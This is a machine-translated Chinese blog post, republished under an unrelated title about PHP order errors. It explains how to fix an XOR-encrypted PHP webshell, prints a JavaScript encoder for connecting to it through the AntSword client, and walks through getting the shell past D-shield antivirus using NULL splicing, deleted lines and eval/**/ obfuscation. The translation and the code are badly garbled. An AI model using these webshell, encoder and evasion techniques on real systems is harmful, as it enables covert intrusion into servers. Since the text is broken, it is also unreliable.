Shulou(Shulou.com)06/01 Report--

This article introduces why the order submitted in php is more than 11 characters will report an error, the content is very detailed, interested friends can refer to, hope to be helpful.

Analysis of 0x01 problem

I left the colored eggs for everyone at the end of the article (I certainly won't win the bid if I read the article carefully).

Next, I will share with you how to play with colored eggs.

In the ground gas brother Payload tool, the value of key has been copied many times, so that when we enter the Payload statement to be serialize by the program, each bit will perform the XOR operation after the ASCII code to reverse the encrypted Base64 code. We can see the inversion process from lines 25 to 28, because the ASCII code is gradually derived from the substr.

Let's see what happens when the substr function returns null.

We see that when substr cannot intercept anything, PHP returns "empty", but after ord conversion, it returns a real 0, because the key in the earth gas brother is written to death, and when we generate more Payload, there will be 0 de-XOR program generated for the first time to encrypt a Payload bit, which is obviously unreasonable.

0x02 problem solving

The most effective way to solve this problem should be to let the program copy and paste Key dynamically, which can achieve infinite length.

Here the author pastes out the modified script:

Modification and use demonstration of 0x04 Ant Sword

Below, the author wrote an encoder of the ant sword, which is used to link the Trojan horse.

Encoder code:

/ * * php::base64 Encoder * Create at: 13:38:35 on 2020-10-14 * / 'use strict' / * * @ param {String} pwd connection password * @ param {Array} payload array before processing by data encoder * @ return {Array} payload array after data encoder processing * / module.exports = (pwd, data Ext= {}) = > {/ / # Please write your own code below # / / the following code is a sample PHP Base64 let obj = {'ak':'aec7e489-2fbc-4b15-871fmuri 1d686eeb80dcpole Let objStr = JSON.stringify (obj); / / generate a random variable name let pass = 't'; let t = pass.repeat (obj.d.length-1); let text =''; for (let I = 0; I < objStr.length; I + +) {text + = String.fromCharCode (objStr.charCodeAt () ^ t.charCodeAt ());} let key = obj.ak; var value =''; for (let I = 0; I < text.length) Value +) {if (! key [I]) {key + = obj.ak;} value + = String.fromCharCode (text [I] .charCodeAt () ^ key [I]. CharCodeAt ());} data [t] = Buffer.from (value) .toString ('base64') / / # Please write your own code above # / / delete the original payload delete data ['_']; / / return the payload array return data;} processed by the encoder

Of course, the AK value of line 15 of the encoder needs to correspond to the key in the horse.

Demo:

(horse password is arbitrary)

Friendly Tips from 0x05 Dogs

The horse traffic is very strong, but the script itself is not immune to kill.

Let's take a look at the horse being hammered by the D shield:

What should I do? Around ah, such a good girl, the encoder has been completed, can not be wasted!

When you see the prompt eval back door, there is a problem with the parameter $vv. Let's take a look:

It's simple to use the NULL stitching method (although some common horses can no longer pass).

Don't report eval's mistake now, there's a chance!

You can see the error of $GLOBALS, so let's go directly to line 6 and take a look.

The code does not affect the whole horse, delete it directly!

Let's take a look at the results:

ByPass!

0x06 bypassed through the unlocking of the horse

Through some analysis of Brother Geqi, get some inspiration from it, NULL splicing is no longer lonely, unrestrained again ~!

We have been neglecting the question of what exactly is stored in $GLOBALS. Today, let's take a look at var_dump.

You can see that $_ GET/$_POST/$_COOKIE is stored in these things.

At this time, the author thought of the eval/**/ () format and the confusion of some variable values, and wrote the second simple sentence Trojan horse.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.